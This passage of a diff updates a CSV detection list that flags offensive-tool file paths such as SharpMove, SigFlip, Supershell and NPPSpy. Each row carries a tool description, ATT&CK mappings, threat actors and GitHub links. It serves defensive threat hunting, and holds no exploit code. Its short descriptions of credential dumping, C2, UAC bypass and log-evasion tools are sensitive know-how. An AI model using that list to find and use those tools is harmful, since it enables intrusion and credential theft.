TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" -"*\SharpHoundCommon\*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*\SharpMove.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*\SharpHoundCommon\*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*\SharpMove.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*\SharpNoPSExec*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*\SharpRDPHijack*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","0","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*\SharpSpray.exe*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" @@ -6416,52 +6546,56 @@ "*\shellcode_samples\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*\sherlock.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*\Shhmon.*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" -"*\SigFlip.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*\SigFlip.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*\sigthief.exe*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" -"*\SilentClean.exe*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" -"*\SilentProcessExit.sln*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*\SilentClean.exe*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*\SilentProcessExit.sln*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*\SillyRAT\*.py","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*\SimpleLoader.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*\SimpleLoader.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\SimpleLoader.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\SimpleLoader.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\sitadel.log*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" -"*\SMB_RPC\*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*\smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","228","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" -"*\sniff.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\slinky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\SMB_RPC\*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"*\sniff.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*\spellbound-main*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*\spellgen.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*\spellstager.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" -"*\SpoofCmdLine\TheThing*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*\spider_plus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\SpoofCmdLine\TheThing*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*\spooler.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\SprayAD.cna*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" "*\SprayAD.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*\SQLInfoDumps*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\SQLInfoDumps*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*\SQLRecon*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" "*\stager.ps1*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*\start_campaign.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*\StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*\StolenPasswords.txt*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*\StolenPasswords.txt*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*\Suborner.sln*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","0","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" -"*\Supernova.exe*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*\Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*\Supershell\rssh\pkg\*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*\Supershell\rssh\pkg\*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*\Supernova.exe*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*\Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*\Supershell\rssh\pkg\*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*\Supershell\rssh\pkg\*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*\systemic.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 